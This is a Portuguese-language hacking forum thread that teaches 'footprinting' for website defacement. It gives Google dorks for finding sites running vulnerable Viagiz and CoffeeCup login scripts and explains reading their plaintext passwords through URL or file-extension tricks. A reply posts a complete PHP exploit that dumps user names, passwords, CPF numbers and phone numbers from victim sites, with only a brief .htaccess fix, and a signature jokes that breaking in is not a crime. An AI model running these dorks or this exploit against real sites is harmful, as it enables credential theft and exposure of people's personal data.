Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

A importância do footprinting

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Matéria A importância do footprinting

    O footprinting, geralmente, é a primeira parte de uma invasão ou pentest. Trata-se da busca de informações, usando mecanismos de pesquisas, whois, engenharia social e outros meios.
    Esta é uma etapa indispensável, pois você conhece o sistema do alvo, os públicos utilizados, pesquisa suas vulnerabilidades, baixa estes públicos utilizados e os testa em sua máquina.
    Normalmente, acelera o trabalho de um hacker.
    Agora, vamos ver sua importância no deface. Digamos que você queira invadir um website que utiliza um sistema de fórum muito conhecido, como PHPBB, e sistema de portal em mesma condição, como o PHP Nuke. A partir daí, você deve entrar em websites de pesquisa de vulnerabilidade (de preferência, cadastrando-se no newsletter), e baixar esses scripts para o seu computador, para que você tenha acesso a áreas que não teria como visitante, e assim pesquisar suas vulnerabilidades.

    Vamos ver um exemplo disso na prática?
    Vou dar dois exemplos de scripts públicos, utilizados em larga escala, vulneráveis.

    O primeiro diz respeito à um sistema de segurança desenvolvido pela Viagiz e distribuido em diversos websites de compartilhamento de scripts open-source. Baixamos o script e o colocamos no servidor.
    Vemos sua área de administração e o mais importante: "desfribamos" o código e vemos como é feito o cadastro de usuários e a autenticação.
    Olha só que interessante: os dados são guardados no diretório /usuarios, em arquivos de texto, e a senha não está criptografada.
    Agora, vamos usar o Google para pesquisar por websites vulneráveis, pesquisando por:
    Código:
    intitle:Página intitle:Protegida intitle:Desenvolvido intitle:por intitle:Viagiz.com
    Olha só que listão! Vamos entrar em qualquer um deles?
    Agora, que tal olhar a URL e trocar entrar.php?(...) por usuarios? Temos a lista de usuários cadastrados. Abrimos qualquer um e temos sua senha! Que incrível!

    Agora, vejamos o segundo exemplo. Trata-se de um software criado pela CoffeeCup, chamado Password Wizard. Seu design é sempre o mesmo, em horizontal ou vertical. Baixando o software e o testando, você vê que ele guarda os usuários em um arquivo chamado (nome do projeto).apw.
    Vamos pesquisar no Google por:
    Código:
    login.swf
    Vamos ver qualquer um, entrar no código-fonte e procurar pela EMBED ou OBJECT responsável pelo formulário de login (neste caso, em flash). Pegue o nome do arquivo SWF e abra-o, trocando a extensão .swf por .apw. Navegue até o fim do arquivo e... pronto!

    Estes dois exemplos foram para se ter uma ideia e para reforçar a hipótese apresentada no início do post. Procure não utilizar softwares automáticos, leia os HTTP Headers e conheça bem o alvo antes de começar o ataque.

    Até a próxima!
    Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



    Notify-list · Twitter · Blog

    Nova lei: Invadir computadores protegidos é crime.
    Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)
    Similar Threads

  • Font Size
    #2
    Para a primeira vulnerabilidade, do sistema da Viagiz, tenho o seguinte exploit:
    Código PHP:
    <?php
    # Exploit Title: Área Protegida
    # Google Dork: inurl:"cadastro.php" intitle:VIAGIZ
    # Date: 2012-03-27
    # Author: WhiteCollarGroup
    # Version: 1.0
    /*
    "Área Protegida"
    desenvolvida por Viagiz.com

    Exploit desenvolvido por WhiteCollarGroup
    WCG147 | 0KaL | #M0rph | NB

    Dorks:
    inurl:entrar.php intitle:"Página protegida"
    inurl:"cadastro.php" intitle:VIAGIZ
    inurl:"entrar.php" intext:"Área protegida"

    Sistema: Área Protegida
    Desenvolvedor: Viagiz.com
    Descrição: Sistema de gerenciamento de usuários desenvolvido em PHP que não requer SQL.

    Falha: Acesso ao banco de dados
    O sistema utiliza arquivos de texto para guardar seus dados, e não há proteção contra acesso nestes arquivos.
    Versões atingidas: 1.0 (atual em 27/03/2012)

    Reportagem: Não foi possível entrar em contato com os desenvolvedores.

    Resolução:
    Crie um arquivo de nome '.htaccess' no diretório "usuarios/" e coloque o seguinte conteúdo:
    #begin
    Order Allow,Deny
    Deny from All
    #end

    */
    set_time_limit(0);
    function 
    show($msg) {
      echo 
    $msg."\r\n";
    }

    show("\"Área Protegida\" (acesso ao banco de dados) Exploit\n
    Coded by WhiteCollarGroup
    WCG147 | 0KaL | #M0rph | NB
    @WCollarGroup
    whitecollar_group@hotmail.com"
    );

    if(
    $argc!=2) {
      
    show("Uso: php $argv[0] [host+path]
      Exemplo:
      php 
    $argv[0] http://www.site.com/paginaprotegida/entrar.php?url=/paginaprotegida/index.php");
      exit;
    }

    $path $argv[1];
    if(
    substr($path, -11)=="/") {
      
    $path substr($path0, -1);
    }

    if(
    strpos($path"?")) {
      
    $patharr explode("?"$path);
      
    $path $patharr[0];
    }

    $end end(explode("/"$path));
    if(
    preg_match("/^(.*)\.(.*)$/"$end)) {
      
    $path dirname($path)."/";
    }

    show("[*] Verificando vulnerabilidade...");
    $payload = @file_get_contents($path."usuarios/");
    if(!
    $payload) {
      
    show("[!] Não foi possível ler o conteúdo do servidor.");
      exit;
    }

    show("[*] Obtendo lista de usuários...");
    preg_match_all("/\.txt\">(.*)\.txt<\/a>/"$payload$users);
    //print_r($users);
    show("[*] ".count($users[1])." usuários encontrados.");
    show("[*] Obtendo dados dos usuários...");
    foreach(
    $users[1] as $u) {
      
    $dados = @file_get_contents($path."usuarios/".$u.".txt");
      
    $dados_r = array("<?php\n""$""=""\n?>""\n\n""<?php""senha""nome""cpf""data""fone""cad");
      
    $dados_t = array(nullnull": "null"\n"null"Senha""Nome""CPF""Nascimento""Telefone""Cadastro");
      
    $dados str_replace($dados_r$dados_t$dados);
      
    $dados str_replace("Senha:""Login: $u\nSenha:"$dados);
      
    show($dados);
    }
    show("\n[*] Exploit complete.\n");
    Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



    Notify-list · Twitter · Blog

    Nova lei: Invadir computadores protegidos é crime.
    Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

    Comment


    • Font Size
      #3
      Valeu kra!!

      Comment

      X
      Working...
      X